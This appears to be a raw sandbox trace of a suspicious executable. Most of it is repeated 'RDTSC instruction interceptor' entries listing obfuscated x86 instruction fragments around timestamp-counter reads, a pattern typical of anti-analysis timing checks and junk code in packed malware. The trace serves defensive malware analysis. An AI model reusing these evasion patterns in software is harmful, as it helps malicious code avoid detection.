Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C6081B second address: 4C608A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [76FB65FCh] 0x0000000b pushad 0x0000000c call 00007FD180B5C162h 0x00000011 mov ch, 39h 0x00000013 pop edi 0x00000014 pushfd 0x00000015 jmp 00007FD180B5C15Ch 0x0000001a or ecx, 16A3FDD8h 0x00000020 jmp 00007FD180B5C15Bh 0x00000025 popfd 0x00000026 popad 0x00000027 test eax, eax 0x00000029 jmp 00007FD180B5C166h 0x0000002e je 00007FD1F2E2F248h 0x00000034 jmp 00007FD180B5C160h 0x00000039 mov ecx, eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FD180B5C167h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C608A5 second address: 4C608CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C608CB second address: 4C608CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C608CF second address: 4C608D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C608D5 second address: 4C608FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c pushad 0x0000000d push esi 0x0000000e mov ecx, edx 0x00000010 pop edx 0x00000011 popad 0x00000012 ror eax, cl 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD180B5C15Bh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C608FE second address: 4C60902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C60902 second address: 4C60908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C60908 second address: 4C6094B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD1807ED552h 0x00000008 call 00007FD1807ED552h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 leave 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD1807ED553h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C6094B second address: 4C6094F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C6094F second address: 4C60955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10034 second address: 4C10048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD180B5C160h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10148 second address: 4C10177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD1807ED558h 0x00000009 and cx, D088h 0x0000000e jmp 00007FD1807ED54Bh 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10177 second address: 4C1020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FD180B5C15Fh 0x0000000d xchg eax, esi 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD180B5C164h 0x00000015 add eax, 7E982618h 0x0000001b jmp 00007FD180B5C15Bh 0x00000020 popfd 0x00000021 push esi 0x00000022 pushad 0x00000023 popad 0x00000024 pop ebx 0x00000025 popad 0x00000026 mov esi, dword ptr [ebp+08h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FD180B5C15Dh 0x00000032 adc cx, 87B6h 0x00000037 jmp 00007FD180B5C161h 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007FD180B5C160h 0x00000043 sbb ax, AAD8h 0x00000048 jmp 00007FD180B5C15Bh 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C1020A second address: 4C10280 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov di, F3C6h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esp 0x0000000d jmp 00007FD1807ED54Ah 0x00000012 mov dword ptr [esp], edi 0x00000015 pushad 0x00000016 mov eax, 48F1454Dh 0x0000001b pushfd 0x0000001c jmp 00007FD1807ED54Ah 0x00000021 and ch, 00000068h 0x00000024 jmp 00007FD1807ED54Bh 0x00000029 popfd 0x0000002a popad 0x0000002b test esi, esi 0x0000002d jmp 00007FD1807ED556h 0x00000032 je 00007FD1F2B0B8FEh 0x00000038 jmp 00007FD1807ED550h 0x0000003d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10280 second address: 4C1029D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C1029D second address: 4C102C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD1F2B0B8BFh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD1807ED54Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C102C5 second address: 4C102CF instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C102CF second address: 4C10310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov edx, dword ptr [esi+44h] 0x00000009 pushad 0x0000000a jmp 00007FD1807ED555h 0x0000000f mov dx, si 0x00000012 popad 0x00000013 or edx, dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD1807ED559h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10310 second address: 4C10344 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FD180B5C163h 0x00000017 mov edx, eax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10344 second address: 4C1034A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C008F5 second address: 4C0097F instructions: 0x00000000 rdtsc 0x00000002 call 00007FD180B5C164h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d jmp 00007FD180B5C161h 0x00000012 and esp, FFFFFFF8h 0x00000015 jmp 00007FD180B5C15Eh 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FD180B5C15Eh 0x00000022 sub eax, 3E643188h 0x00000028 jmp 00007FD180B5C15Bh 0x0000002d popfd 0x0000002e mov ebx, esi 0x00000030 popad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FD180B5C15Eh 0x0000003b and ecx, 66F713E8h 0x00000041 jmp 00007FD180B5C15Bh 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C0097F second address: 4C0099F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED555h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C0099F second address: 4C009A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C009A3 second address: 4C009A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C009A9 second address: 4C009C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, ax 0x00000010 push eax 0x00000011 pop ebx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C009C9 second address: 4C00A26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD1807ED551h 0x00000008 mov edi, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 mov edi, 0C63314Ch 0x00000015 jmp 00007FD1807ED555h 0x0000001a popad 0x0000001b push ecx 0x0000001c mov cx, dx 0x0000001f pop edi 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 jmp 00007FD1807ED556h 0x00000027 mov esi, dword ptr [ebp+08h] 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov esi, edi 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00A26 second address: 4C00AF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C165h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c push edx 0x0000000d call 00007FD180B5C168h 0x00000012 pop esi 0x00000013 pop ebx 0x00000014 pushad 0x00000015 call 00007FD180B5C15Eh 0x0000001a pop ecx 0x0000001b movsx edx, ax 0x0000001e popad 0x0000001f popad 0x00000020 test esi, esi 0x00000022 pushad 0x00000023 jmp 00007FD180B5C168h 0x00000028 pushfd 0x00000029 jmp 00007FD180B5C162h 0x0000002e adc al, 00000048h 0x00000031 jmp 00007FD180B5C15Bh 0x00000036 popfd 0x00000037 popad 0x00000038 je 00007FD1F2E81A34h 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007FD180B5C164h 0x00000045 add cx, BBA8h 0x0000004a jmp 00007FD180B5C15Bh 0x0000004f popfd 0x00000050 movzx eax, dx 0x00000053 popad 0x00000054 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e push ecx 0x0000005f pop edx 0x00000060 mov ebx, eax 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00AF0 second address: 4C00B53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD1807ED54Bh 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ecx, esi 0x0000000e jmp 00007FD1807ED552h 0x00000013 je 00007FD1F2B12DD3h 0x00000019 jmp 00007FD1807ED550h 0x0000001e test byte ptr [76FB6968h], 00000002h 0x00000025 pushad 0x00000026 mov ax, 522Dh 0x0000002a popad 0x0000002b jne 00007FD1F2B12DC3h 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FD1807ED552h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00B53 second address: 4C00B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD180B5C15Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00B65 second address: 4C00B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00B69 second address: 4C00BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c mov eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007FD180B5C15Fh 0x00000016 add ax, DE6Eh 0x0000001b jmp 00007FD180B5C169h 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00BA8 second address: 4C00BCE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 5AB423F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b jmp 00007FD1807ED54Ah 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD1807ED54Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00BCE second address: 4C00BF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 42C4h 0x00000007 mov bx, C730h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebx 0x0000000f jmp 00007FD180B5C15Fh 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movsx edi, cx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00BF4 second address: 4C00C19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bh, cl 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00C19 second address: 4C00C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00C1E second address: 4C00C3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED552h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00C3B second address: 4C00C41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00C41 second address: 4C00C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00C47 second address: 4C00C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00C4B second address: 4C00C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+14h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD1807ED559h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C00C71 second address: 4C00C76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10E33 second address: 4C10E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10E37 second address: 4C10E50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C165h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10E50 second address: 4C10E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10E56 second address: 4C10E65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10E65 second address: 4C10E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10E69 second address: 4C10E6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10AE2 second address: 4C10B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 jmp 00007FD1807ED54Ah 0x0000000b push eax 0x0000000c jmp 00007FD1807ED54Bh 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD1807ED550h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10B13 second address: 4C10B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10B17 second address: 4C10B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10B1D second address: 4C10B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10B23 second address: 4C10B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10B27 second address: 4C10B2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10B2B second address: 4C10B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10B3B second address: 4C10B4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10B4C second address: 4C10B5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED54Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10B5C second address: 4C10B76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov esi, 0050303Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C9070F second address: 4C9071E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8085E second address: 4C80864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80864 second address: 4C80868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80868 second address: 4C8086C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8086C second address: 4C8087A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov ah, 35h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8087A second address: 4C808C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FD180B5C168h 0x0000000f add si, 58D8h 0x00000014 jmp 00007FD180B5C15Bh 0x00000019 popfd 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C808C7 second address: 4C808CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C808CB second address: 4C808CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C808CF second address: 4C808D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C808D5 second address: 4C808ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C808ED second address: 4C80900 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80900 second address: 4C80906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80906 second address: 4C8090A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8090A second address: 4C80934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD180B5C165h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80934 second address: 4C8093A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8093A second address: 4C8093E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8093E second address: 4C80957 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b call 00007FD1807ED54Bh 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80727 second address: 4C8072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8072D second address: 4C80731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80731 second address: 4C8074E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD180B5C160h 0x00000012 rdtsc
